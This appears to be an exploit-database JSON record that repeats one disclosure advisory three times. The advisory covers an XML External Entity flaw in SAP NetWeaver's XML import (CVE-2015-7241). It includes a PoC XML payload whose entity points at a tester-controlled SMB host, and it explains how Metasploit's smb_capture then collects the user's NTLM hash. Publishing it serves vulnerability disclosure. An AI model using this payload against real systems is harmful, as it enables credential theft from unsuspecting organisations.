{"securityvulns": [{"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "description": "\r\n\r\nTitle: SAP Netwaver - XML External Entity Injection\r\nAuthor: Lukasz Miedzinski\r\nGPG: Public key provided in attachment\r\nDate: 29/10/2014\r\nCVE: CVE-2015-7241\r\n\r\nAffected software :\r\n===================\r\n\r\nSAP Netwear : <7.01\r\n\r\nVendor advisories (only for customers):\r\n===================\r\nExternal ID : 851975 2014\r\nTitle: XML External Entity vulnerability in SAP XML Parser\r\nSecurity Note: 2098608\r\nAdvisory Plan Date: 12/5/2014\r\nDelivery date of fix/Patch Day: 10/2/2014\r\nCVSS Base Score: 5.5\r\nCVSS Base Vector: AV:N/AC:L/AU:S/C:P/I:N/A:P\r\n\r\n\r\nDescription :\r\n=============\r\nXML External Entity Injection vulnerability has been found in the XML\r\nparser in the System\r\n\r\nAdministration->XML Content and Actions -> Import section.\r\n\r\n\r\nVulnerabilities :\r\n*****************\r\n\r\nXML External Entity Injection :\r\n======================\r\n\r\n\r\nExample show how pentester is able to get NTLM hash of application's user.\r\n\r\nContent of file (PoC) :\r\n\r\n<?xml version="1.0" encoding="UTF-8"?>\r\n<!DOCTYPE root [\r\n<!ENTITY % remote SYSTEM "file:////Tester.IP/test"> %remote; %param1; ]>\r\n<root/>\r\n\r\nWhen pentester has metasploit smb_capture module run, then application\r\nwill contatc him and provide\r\n\r\nNTLM hash of user.\r\n\r\n\r\nContact :\r\n=========\r\n\r\nLukasz[dot]Miedzinski[at]gmail[dot]com\r\n\r\n", "modified": "2015-10-25T00:00:00", "published": "2015-10-25T00:00:00", "id": "SECURITYVULNS:DOC:32584", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32584", "title": "SAP Netwaver - XML External Entity Injection", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:02", "bulletinFamily": "software", "description": "Unauthorized access, XXE.", "modified": "2015-10-25T00:00:00", "published": "2015-10-25T00:00:00", "id": "SECURITYVULNS:VULN:14744", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14744", "title": "SAP NetWeaver security vulnerabilities", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:14:09", "bulletinFamily": "exploit", "description": "", "modified": "2015-09-21T00:00:00", "published": "2015-09-21T00:00:00", "href": "https://packetstormsecurity.com/files/133627/SAP-Netweaver-XML-External-Entity-Injection.html", "id": "PACKETSTORM:133627", "type": "packetstorm", "title": "SAP Netweaver XML External Entity Injection", "sourceData": "`Title: SAP Netwaver - XML External Entity Injection \nAuthor: Lukasz Miedzinski \nGPG: Public key provided in attachment \nDate: 29/10/2014 \nCVE: CVE-2015-7241 \n \nAffected software : \n=================== \n \nSAP Netwear : <7.01 \n \nVendor advisories (only for customers): \n=================== \nExternal ID : 851975 2014 \nTitle: XML External Entity vulnerability in SAP XML Parser \nSecurity Note: 2098608 \nAdvisory Plan Date: 12/5/2014 \nDelivery date of fix/Patch Day: 10/2/2014 \nCVSS Base Score: 5.5 \nCVSS Base Vector: AV:N/AC:L/AU:S/C:P/I:N/A:P \n \n \nDescription : \n============= \nXML External Entity Injection vulnerability has been found in the XML \nparser in the System \n \nAdministration->XML Content and Actions -> Import section. \n \n \nVulnerabilities : \n***************** \n \nXML External Entity Injection : \n====================== \n \n \nExample show how pentester is able to get NTLM hash of application's user. \n \nContent of file (PoC) : \n \n<?xml version=\"1.0\" encoding=\"UTF-8\"?> \n<!DOCTYPE root [ \n<!ENTITY % remote SYSTEM \"file:////Tester.IP/test\"> %remote; %param1; ]> \n<root/> \n \nWhen pentester has metasploit smb_capture module run, then application \nwill contatc him and provide \n \nNTLM hash of user. \n \n \nContact : \n========= \n \nLukasz[dot]Miedzinski[at]gmail[dot]com \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/133627/sapnetweaver-xxe.txt", "cvss": {"score": 0.0, "vector": "NONE"}}], "exploitdb": [{"lastseen": "2016-02-04T07:41:00", "bulletinFamily": "exploit", "description": "SAP Netweaver < 7.01 - XML External Entity Injection. CVE-2015-7241. Webapps exploit for xml platform", "modified": "2015-09-22T00:00:00", "published": "2015-09-22T00:00:00", "id": "EDB-ID:38261", "href": "https://www.exploit-db.com/exploits/38261/", "type": "exploitdb", "title": "SAP Netweaver < 7.01 - XML External Entity Injection", "sourceData": "Title: SAP Netwaver - XML External Entity Injection\r\nAuthor: Lukasz Miedzinski\r\nGPG: Public key provided in attachment\r\nDate: 29/10/2014\r\nCVE: CVE-2015-7241\r\n\r\nAffected software :\r\n===================\r\n\r\nSAP Netwear : <7.01\r\n\r\nVendor advisories (only for customers):\r\n===================\r\nExternal ID : 851975 2014\r\nTitle: XML External Entity vulnerability in SAP XML Parser\r\nSecurity Note: 2098608\r\nAdvisory Plan Date: 12/5/2014\r\nDelivery date of fix/Patch Day: 10/2/2014\r\nCVSS Base Score: 5.5\r\nCVSS Base Vector: AV:N/AC:L/AU:S/C:P/I:N/A:P\r\n\r\n\r\nDescription :\r\n=============\r\nXML External Entity Injection vulnerability has been found in the XML\r\nparser in the System\r\n\r\nAdministration->XML Content and Actions -> Import section.\r\n\r\n\r\nVulnerabilities :\r\n*****************\r\n\r\nXML External Entity Injection :\r\n======================\r\n\r\n\r\nExample show how pentester is able to get NTLM hash of application's user.\r\n\r\nContent of file (PoC) :\r\n\r\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\r\n<!DOCTYPE root [\r\n<!ENTITY % remote SYSTEM \"file:////Tester.IP/test\"> %remote; %param1; ]>\r\n<root/>\r\n\r\nWhen pentester has metasploit smb_capture module run, then application\r\nwill contatc him and provide\r\n\r\nNTLM hash of user.\r\n\r\n\r\nContact :\r\n=========\r\n\r\nLukasz[dot]Miedzinski[at]gmail[dot]com", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/38261/"}]}